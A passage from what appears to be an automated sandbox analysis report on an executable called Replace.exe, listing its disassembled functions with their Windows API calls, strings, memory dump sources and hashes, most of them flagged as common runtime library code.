                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00BB454C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemVersionlstrcatlstrlen
                                                                                                                                                                                                              • String ID: .dll$SetDefaultDllDirectories$UXTHEME$kernel32.dll
                                                                                                                                                                                                              • API String ID: 532070074-1956823469
                                                                                                                                                                                                              • Opcode ID: ee4304279c61602bef03ca50188f696debc3e68945a3bcda59ddd9cdb11bb87d
                                                                                                                                                                                                              • Instruction ID: b2b80ea13b75ec7269b693b905b691d7cab21d336fbb4a4aa7c1cb297de85093
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee4304279c61602bef03ca50188f696debc3e68945a3bcda59ddd9cdb11bb87d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9221713151024A9BDB209FA8D858BEEB7E8FF14701F04049AE542E7191EFB4D658CB51
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BCF21B Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 00BCF318
                                                                                                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 00BCF33A
                                                                                                                                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 00BCF449
                                                                                                                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 00BCF51B
                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00BCF59F
                                                                                                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 00BCF5BA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                              • API String ID: 2123188842-393685449
                                                                                                                                                                                                              • Opcode ID: db2bf2bdeb2fac0b3bb2f1c87693baef7a984be17ba83582404e811329fc48e3
                                                                                                                                                                                                              • Instruction ID: bbba7f6afec50516a401d7e0a600cac06e5528f1cc4773483b5d6deeb2603425
                                                                                                                                                                                                              • Opcode Fuzzy Hash: db2bf2bdeb2fac0b3bb2f1c87693baef7a984be17ba83582404e811329fc48e3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52B1127190020AEBCF29DFA4C981EAEBBF6FF54310B1441EEE9156B212D731DA51CB91
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB7F11 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 61windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00BB7F32
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BB7F3E
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00BB7F41
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32 ref: 00BB7F48
                                                                                                                                                                                                              • MessageBoxW.USER32(?,Are you sure you want to cancel?,?,00000003), ref: 00BB7F5F
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00BB7F72
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BB7F78
                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 00BB7F9A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Are you sure you want to cancel?, xrefs: 00BB7F57
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$DialogMessage
                                                                                                                                                                                                              • String ID: Are you sure you want to cancel?
                                                                                                                                                                                                              • API String ID: 2225717242-577246718
                                                                                                                                                                                                              • Opcode ID: 2191eed79d172634fd41aa334c9595e03079619263811334f5e5b05144bf27f8
                                                                                                                                                                                                              • Instruction ID: a7885743aeceb53a4dcbdf912f99ba97128b68c6e3abbaa995c4d161742efd05
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2191eed79d172634fd41aa334c9595e03079619263811334f5e5b05144bf27f8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E11BF3114C288EFC710AF29DC48F6AFFE9EF95314F05048EF48497261CBA1A814CB65
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD1E5B Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1E71
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?), ref: 00BD1C11
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: GetLastError.KERNEL32(?,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?,?), ref: 00BD1C23
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1E7D
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1E88
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1E93
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1E9E
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1EA9
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1EB4
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1EBF
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1ECA
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1ED8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                              • Opcode ID: 57e3b346f35d3ac13f07c6da528a0f122eb80c78b4305754191893b61f03901d
                                                                                                                                                                                                              • Instruction ID: 2d08d759e1ff9f8b7e9c0ea79e5e20bcc0ee8cb58197c6df040ce78cee5a32d4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57e3b346f35d3ac13f07c6da528a0f122eb80c78b4305754191893b61f03901d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB217776905108BFCB41EF98C981DDDBBB5AF08340B0185A7F6559B221FA31DA458F80
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB1000 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 14libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00BB1006
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FindFirstStreamW), ref: 00BB1014
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FindNextStreamW), ref: 00BB1025
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                                              • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll$ u
                                                                                                                                                                                                              • API String ID: 667068680-3382339687
                                                                                                                                                                                                              • Opcode ID: 7c9cc7747ba7f604db9a387c129374c87da3cb7860f1c50c011d60447652f53c
                                                                                                                                                                                                              • Instruction ID: f8e0d4069f3ae901ce1ce5a7ef0ad187405e39ad74ced9e0398896c52d2c673d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c9cc7747ba7f604db9a387c129374c87da3cb7860f1c50c011d60447652f53c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61D09E72999247DB83005BA5BC6EC3ABBA8F695B4230144AFF41293375FFB444018B10
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BCDB70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00BCDBA7
                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00BCDBAF
                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00BCDC38
                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00BCDC63
                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00BCDCB8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                              • Opcode ID: 1f753ce7312c9cfd19b9439ab43d2031710adda67f9ab8bd385e2c3eb4fb2d41
                                                                                                                                                                                                              • Instruction ID: 66f9004ef3a644af7d674fbf1975fc2d85a54aaf0a36757360ff4ae8198a01c0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f753ce7312c9cfd19b9439ab43d2031710adda67f9ab8bd385e2c3eb4fb2d41
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0416138A00219ABCF10DF68C895FAFBBF5EF45324F1481E9E9159B352D7719A11CB90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD42D7 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BD429F: _free.LIBCMT ref: 00BD42C4
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD4325
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?), ref: 00BD1C11
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: GetLastError.KERNEL32(?,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?,?), ref: 00BD1C23
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD4330
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD433B
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD438F
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD439A
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD43A5
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD43B0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                              • Opcode ID: b5963aa43858a3eeaa73d934842b9e026f453944b06c28224dffe2d9edd7b786
                                                                                                                                                                                                              • Instruction ID: d3f3db36a5ba575dffc2ac8347b9f0ba31b060ba750e6640680319c044c6cc73
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5963aa43858a3eeaa73d934842b9e026f453944b06c28224dffe2d9edd7b786
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D112C71695B08BBD560B7B0CC87FCBF7ECAF14700F410C57B29966252FB75A5144A50
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD61B7 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00BD61FF
                                                                                                                                                                                                              • __fassign.LIBCMT ref: 00BD63E4
                                                                                                                                                                                                              • __fassign.LIBCMT ref: 00BD6401
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000020,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BD6449
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00BD6489
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BD6531
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1735259414-0
                                                                                                                                                                                                              • Opcode ID: 9ddaf62b7e19460f85c8cc086272b4563ea6e482ee68e838591ba70f27f9b02e
                                                                                                                                                                                                              • Instruction ID: 554f26c298ffc24d443d1ca591e65ae19e1fb0fc36f2e646f72e89ab9637a807
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ddaf62b7e19460f85c8cc086272b4563ea6e482ee68e838591ba70f27f9b02e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11C15C75D012589FCB15CFA8D8809EDFBF5EF18314F2841AAE855AB341E6319E46CF50
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BCEEE4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00BCEEDB,00BCDB17,00BCCB7A), ref: 00BCEEF2
                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BCEF00
                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BCEF19
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,00BCEEDB,00BCDB17,00BCCB7A), ref: 00BCEF6B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                              • Opcode ID: ee89ea4e343fd0658ef53dc38d35cb9c7b171c294dfd12850802be4d4170b83f
                                                                                                                                                                                                              • Instruction ID: 4b81c132eb1438f4fe2b20140c36142ba56347bc64af7dc94ab9fcb064c91e27
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee89ea4e343fd0658ef53dc38d35cb9c7b171c294dfd12850802be4d4170b83f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C01F13221D326EEB62526747CC5F2B6BD8EB217B5B2002AFF1218A2E2FF118C005140
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD309D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • C:\Users\user\Desktop\Replace.exe, xrefs: 00BD30A2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\Replace.exe
                                                                                                                                                                                                              • API String ID: 0-2253954093
                                                                                                                                                                                                              • Opcode ID: 4b07a580d5bc26d4f5bdb1a9ca07d6cb025d15876e01d551bdc8c29572dc0e19
                                                                                                                                                                                                              • Instruction ID: 28bd0758609c58e14a0f34cb949a0946644187aab4e875e846dea5f4e5208ccc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b07a580d5bc26d4f5bdb1a9ca07d6cb025d15876e01d551bdc8c29572dc0e19
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E218071204206BFDB20ABA58CC1D6BF7ECEB00B6471046A7F515A7352FB31EE4187A2
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BCFF52 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00BD0013,?,?,00BE76BC,00000000,?,00BD013E,00000004,InitializeCriticalSectionEx,00BDBDDC,InitializeCriticalSectionEx,00000000), ref: 00BCFFE2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                              • API String ID: 3664257935-2084034818
                                                                                                                                                                                                              • Opcode ID: 1891234f33d74544966370d9575b85daddcb29743e5085476902564f56db85cd
                                                                                                                                                                                                              • Instruction ID: 88b47de9793e78087f862d5826059eb9b321c7912abc883c6d2771f983989eb1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1891234f33d74544966370d9575b85daddcb29743e5085476902564f56db85cd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2119431A42226EBCB329B689C40F6E77D5EF02760F1505FEE955E7280EB60ED0086D4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD0FD6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00BD0FC8,?,?,00BD0F90,?,?,?), ref: 00BD0FEB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BD0FFE
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00BD0FC8,?,?,00BD0F90,?,?,?), ref: 00BD1021
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                              • Opcode ID: ce6b43bf65ef45ad12917a4fbbb619644f6577ef3e67d12cede1787353750afd
                                                                                                                                                                                                              • Instruction ID: 9b39599c3cd8956086f6f8c49db01852570aa4d9bf6d1220743bdaeee2a4fe89
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce6b43bf65ef45ad12917a4fbbb619644f6577ef3e67d12cede1787353750afd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64F08231901219FBCB21AB54DC19F9EFBB8EB04756F010096E400A3260EF748E40EB90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB1270 Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
